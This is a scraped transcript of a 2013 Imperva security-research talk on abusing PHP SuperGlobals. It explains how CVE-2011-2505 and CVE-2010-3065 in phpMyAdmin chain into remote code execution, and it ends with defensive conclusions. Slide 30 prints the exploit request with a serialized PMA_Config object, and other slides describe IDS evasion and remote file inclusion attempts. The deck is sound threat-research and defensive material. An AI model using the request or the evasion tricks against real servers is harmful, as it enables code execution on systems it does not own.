Presentation is loading. Please wait.

Presentation is loading. Please wait.

© 2013 Imperva, Inc. All rights reserved. PHP SuperGlobals: Supersized Trouble 1 Shelly Hershkovitz, Senior Security Analyst, Imperva.

Published byCameron Poole Modified over 9 years ago

Similar presentations

Presentation on theme: "© 2013 Imperva, Inc. All rights reserved. PHP SuperGlobals: Supersized Trouble 1 Shelly Hershkovitz, Senior Security Analyst, Imperva."— Presentation transcript:

1 © 2013 Imperva, Inc. All rights reserved. PHP SuperGlobals: Supersized Trouble 1 Shelly Hershkovitz, Senior Security Analyst, Imperva

2 © 2013 Imperva, Inc. All rights reserved. Shelly Hershkovitz 2  Senior Security Analyst at Imperva  Leads the efforts to capture and analyze hacking activities Responsible for number of Imperva’s HII reportsreports  Experienced in machine learning and computer vision  Holds BA in Computer Science & M.Sc degree in Bio- Medical Engineering

3 © 2013 Imperva, Inc. All rights reserved. How it all began… 3 Bla bla…CVE-2011-2505 Honeypots

4 © 2013 Imperva, Inc. All rights reserved. HII Reports 4  Hacker Intelligence Initiative is focused at understanding how attackers are operating in practice A different approach from vulnerability research  Data set composition ~60 real world applications Anonymous Proxies  More than 24 months of data  Powerful analysis system Combines analytic tools with drill down capabilities

5 © 2013 Imperva, Inc. All rights reserved. Agenda 5  Introduction Relevant PHP background  An Anatomy of a Modern Web Exploit Abusing SuperGlobals  Demo  Additional PHP SuperGlobal Attacks In the wild  Summary & Conclusions  Q&A

6 © 2013 Imperva, Inc. All rights reserved. Introduction 6 Relevant PHP background

7 © 2013 Imperva, Inc. All rights reserved.  The most popular server-side programming language in the world:  And goes from strength to strength Breadth and Depth of PHP - I

8 © 2013 Imperva, Inc. All rights reserved.  The most popular web applications are powered by PHP Breadth and Depth of PHP – II http://www.alexa.com/topsites

9 © 2013 Imperva, Inc. All rights reserved. Outline – PHP Background 9 SuperGlobals Serialization Session Management

10 © 2013 Imperva, Inc. All rights reserved. PHP SuperGlobals 10  “Local” versus “global” scopes  Global variables Cross-function communication *ANY* function may change them  SuperGlobals: Predefined array variables Available in all scopes  SuperGlobals: cookies, sessions, environment, etc.

11 © 2013 Imperva, Inc. All rights reserved. PHP SuperGlobal list 11 VariableDefinition 1GLOBALS References all variables available in global scope 2_SERVER Server and execution environment information 3_GETHTTP GET variables 4_POSTHTTP POST variables 5_FILESHTTP File upload variables 6_COOKIEHTTP Cookies 7_SESSIONSession variables 8_REQUESTHTTP Request variables 9_ENVEnvironment variables

12 © 2013 Imperva, Inc. All rights reserved. External Variable Modification 12  MITRE Common Weakness Enumeration: CWE-473  “A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies”.  SuperGlobals are a natural target: Exist in every PHP application Provide access to the server’s core functionality

13 © 2013 Imperva, Inc. All rights reserved. Serialization 13  The process of saving data stored in memory to file is called “serialization”  The process of loading data stored in file to memory is called “deserialization” http://www.studytonight.com/java/images/Serialization-deserialization.JPG __sleep()__wakeup()

14 © 2013 Imperva, Inc. All rights reserved. PHP Session Management 14  New user: Unique identifier for the session. A cookie called PHPSESSID is sent to the user with this identifier. A file is created on the server, for example: sess_1q8jkgkoetd3dprcb3n7mpmc4o26eili.  Resuming session data.

15 © 2013 Imperva, Inc. All rights reserved. An Anatomy of a Modern Web Exploit 15 Exploiting SuperGlobals

16 © 2013 Imperva, Inc. All rights reserved. Outline 16  PHPMyAdmin  CVE-2011-2505  CVE-2010-3065  Attack Flow  Demo  Attacks on the wild

17 © 2013 Imperva, Inc. All rights reserved. PHPMyAdmin (PMA) 17  The most popular MySQL administration tool for PHP  Often is bundled by default in LAMP (Linux, Apache, MySQL, PHP) installations

18 © 2013 Imperva, Inc. All rights reserved. Outline – PHP Background 18 SuperGlobals CVE-2010-3065 Session Management Serialization CVE-2011-2505

19 © 2013 Imperva, Inc. All rights reserved. CVE-2011-2505: PhpMyAdmin Vulnerability 19  Parses a given query string to local scope  _SESSION variables are saved in the session’s file on the server http://www.super.com/somePage?_SESSION[username]= bad_stuff username|s:9:"bad_stuff";

20 © 2013 Imperva, Inc. All rights reserved. CVE-2011-2505: PhpMyAdmin Vulnerability 20  PhpMyAdmin’s Unset session functionality  Parse_str() : parses the given query string and stores the variables in the current scope.  Session_write_close(): Makes Session data persistent throughout the entire user’s session.

21 © 2013 Imperva, Inc. All rights reserved. CVE-2011-2505: Exploit 21  An attacker can now Craft a malicious query string with the _SESSION SuperGlobal Injected _SESSION value overrides the session’s original values New values are saved to local file

22 © 2013 Imperva, Inc. All rights reserved.  Discovered by Stefan Esser - Late 2010  Attacker can write data to the _SESSION in *ANY* format, if the session variable name starts with ‘!’ CVE-2010-3065 PHP Vulnerability & Exploit 22

23 © 2013 Imperva, Inc. All rights reserved. Serialization 23  The process of saving data stored in memory to file is called “serialization”  The process of loading data stored in file to memory is called “deserialization” http://www.studytonight.com/java/images/Serialization-deserialization.JPG __sleep()__wakeup()

24 © 2013 Imperva, Inc. All rights reserved. PMA Session deserialization: Vulnerability 24  On session deserialization, the load() function is called  Eval is evil! Can be used to execute unexpected code

25 © 2013 Imperva, Inc. All rights reserved. Attack Flow 25 An attacker sends the 1 st request to receive a cookie An attacker sends the 2 nd request, _SESSION holds: 1. Malicious code 2. PMA_Config serialized object with source=session file path PHP saves the session’s information to local file An attacker sends the 3 rd request PHP deserialize PMA_Config which calls __wakeup(), which calls load(), which calls eval(source=sessio n file)

26 © 2013 Imperva, Inc. All rights reserved. The Exploit Code on the Web 26

27 © 2013 Imperva, Inc. All rights reserved. Attack Flow 27 An attacker sends the 1 st request to receive a cookie An attacker sends the 2 nd request, _SESSION holds: 1. Malicious code 2. PMA_Config serialized object with source=session file path PHP saves the session’s information to local file An attacker sends the 3 rd request PHP unserialize PMA_Config which calls __wakeup(), which calls load(), which calls eval(source=session file)

28 © 2013 Imperva, Inc. All rights reserved. Guessing Session Filename 28  Luckily for the attacker, the location of the session file is predictable  Session File name consists of The “sess_” prefix The session identifier – known to the user/attacker  File’s path is predictable default values

29 © 2013 Imperva, Inc. All rights reserved. Guessing Session Filename: in the wild 29  Multiple guesses for path the same session file (“sess_19qq…”)

30 © 2013 Imperva, Inc. All rights reserved. The Final Exploit 30  Now the attackers can, *FINALLY*, get their code evaluated  /phpMyAdmin/index.php?session_to_unset=123& token=86498ff0a666f808df76ffaabee9b7a3& _SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{ s:6:“source";s:59:"/var/lib/php5/sess_6a3e0376fbfe97970 81a3ee202ef1ca85c451a62";}}& _SESSION[payload]=

31 © 2013 Imperva, Inc. All rights reserved. Demo 31

32 © 2013 Imperva, Inc. All rights reserved. PMA SuperGlobal Attacks in the wild 32  Attacks source is a hacked server  Attacks (at least) two other servers  Attacks persist over half a year

33 © 2013 Imperva, Inc. All rights reserved. A Modern Exploit Summary: Research 33  Sophisticated research  Combines multiple vulnerabilities and issues in multiple domains PHPMyAdmin (PMA) PHP internals

34 © 2013 Imperva, Inc. All rights reserved. A Modern Exploit Summary: Development 34  Exploit packed in a single, “click once” PHP script  Automates the different attack stages  Can be launched from infected servers to infect others

35 © 2013 Imperva, Inc. All rights reserved. PHP SuperGlobal Attacks 35 In the wild

36 © 2013 Imperva, Inc. All rights reserved. SuperGlobal Attacks Targets 36  RFI (Remote File Inclusion): trying to overwrite “_Server[document_root]” to point to external resource

37 © 2013 Imperva, Inc. All rights reserved. SuperGlobal Attacks Targets 37  Part of general scanning against the site – Nikto, Acunetix, Nessus  Intrusion Detection System filter evasion: an alternative way to represent HTTP query parameters “_REQUEST[Itemid]=1” request parameter is equivalent to “Itemid=1” However, it evades a naïve IDS signature that blacklists “Itemid=1”

38 © 2013 Imperva, Inc. All rights reserved. SuperGlobal Attacks Targets 38  During May 2013  3.5K requests that manipulated PHP SuperGlobal variables.  27 different attack sources  24 web applications as targets

39 © 2013 Imperva, Inc. All rights reserved. Targeted SuperGlobal 39  Some SuperGlobals are more targeted than others  The more targeted SuperGlobals provide access to more sensitive resources

40 © 2013 Imperva, Inc. All rights reserved. Summary & Conclusions 40

41 © 2013 Imperva, Inc. All rights reserved. The importance of a positive security model 41  The essence of the external variable manipulation weakness: the attacker has the ability to send out external parameters with the same name of internal variables, and thus override the value of the latter.  External parameters are not part of the standard interface of the targeted application  Blocking all of the internal variables’ names might be difficult with a negative security approach  But trivial with a positive security mechanism that specifies the allowed parameter names for each resource

42 © 2013 Imperva, Inc. All rights reserved. Layered application layer mechanisms 42  Bad news: Attackers can create a complex exploit by combining several vulnerabilities together  Good news: it’s enough to break one of the links in the kill chain to break the chain altogether.  Application layer solution that combines multiple detection mechanisms: positive security model negative security model for generic issues (generic directory traversal protection for this case) Specific CVE detection, is crucial for effective mitigations of such complex attacks.

43 © 2013 Imperva, Inc. All rights reserved. Third-Party Code Perils 43  PHPMyAdmin: Popular utility installation Often bundled with other applications  Even if PMA is not used, the server is exposed to code execution attacks!!  Administrators might not be aware to all bundled software  An “opt out” security model is needed  Optional solution is Web Application Firewall (WAF) with constant updates of security content.

44 © 2013 Imperva, Inc. All rights reserved. Third-party code perils 44  Attackers target popular applications such as the PhpMyAdmin (PMA) utility installation.  PMA is often bundled with other applications.  Having this vulnerable utility present on the server, even if it is not being used, exposes the server to code execution attacks.  Since administrators are not necessarily aware of all the bundled software, an “opt out” security model is needed.  A way to achieve such an “opt out” security model is by deploying a Web Application Firewall (WAF) with constant updates of security content.

45 © 2013 Imperva, Inc. All rights reserved. SuperGlobal parameters in requests should be blocked 45  There is no reason for these parameters to be present in valid requests, they should be banned.  Imperva’s WAF customers received a content update to their Web Application Firewall on January 15 th this year.

46 © 2013 Imperva, Inc. All rights reserved. Conclusions 46  Establish a positive security model  Use layered security mechanisms  Beware of third-party code perils  Block SuperGlobal parameters in requests

47 © 2013 Imperva, Inc. All rights reserved. More information in HII: http://www.imperva.com/resources/hacke r_intelligence.asp 47 Q&A

Download ppt "© 2013 Imperva, Inc. All rights reserved. PHP SuperGlobals: Supersized Trouble 1 Shelly Hershkovitz, Senior Security Analyst, Imperva."

Similar presentations

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Closing the Gap: Analyzing the Limitations of Web Application Vulnerability Scanners David Shelly Randy Marchany Joseph Tront Virginia Polytechnic Institute.

Closing the Gap: Analyzing the Limitations of Web Application Vulnerability Scanners David Shelly Randy Marchany Joseph Tront Virginia Polytechnic Institute.
UFCE8V-20-3 Information Systems Development 3 (SHAPE HK)

UFCE8V-20-3 Information Systems Development 3 (SHAPE HK)
 The Citrix Application Firewall prevents security breaches, data loss, and possible unauthorized modifications to Web sites that access sensitive business.

 The Citrix Application Firewall prevents security breaches, data loss, and possible unauthorized modifications to Web sites that access sensitive business.
Day 4-1-1 anti-virus 3-3-1.anti-virus 1 detecting a malicious file malware, detection, hiding, removing.

Day anti-virus anti-virus 1 detecting a malicious file malware, detection, hiding, removing.
1 Web Servers / Deployment Alastair Dawes Original by Bhupinder Reehal.

1 Web Servers / Deployment Alastair Dawes Original by Bhupinder Reehal.
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
Web Defacement Anh Nguyen May 6 th, 2010. Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.

Web Defacement Anh Nguyen May 6 th, Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.
Aktueller Status How Hackers Cover Their Tracks ECE 4112 May 1st, 2007 Group 1 Chris Garyet Christopher Smith Introduction Lab Content Conclusions Questions.

Aktueller Status How Hackers Cover Their Tracks ECE 4112 May 1st, 2007 Group 1 Chris Garyet Christopher Smith Introduction Lab Content Conclusions Questions.
Information Security 1 Information Security: Demo of Some Security Tools Jeffy Mwakalinga.

Information Security 1 Information Security: Demo of Some Security Tools Jeffy Mwakalinga.
Leveraging User Interactions for In-Depth Testing of Web Applications Sean McAllister, Engin Kirda, and Christopher Kruegel RAID ’08 1 Seoyeon Kang November.

Leveraging User Interactions for In-Depth Testing of Web Applications Sean McAllister, Engin Kirda, and Christopher Kruegel RAID ’08 1 Seoyeon Kang November.
How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.

How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.

Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.

Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.
Introducing LAMP: Linux, Apache, MySQL and PHP Track 2 Workshop PacNOG 7 July 1, 2010 Pago Pago, American Samoa.

Introducing LAMP: Linux, Apache, MySQL and PHP Track 2 Workshop PacNOG 7 July 1, 2010 Pago Pago, American Samoa.
Sys Prog & Scripting - HW Univ1 Systems Programming & Scripting Lecture 15: PHP Introduction.

Sys Prog & Scripting - HW Univ1 Systems Programming & Scripting Lecture 15: PHP Introduction.
W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.

W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.
PHP Security.

PHP Security.

Similar presentations

Ads by Google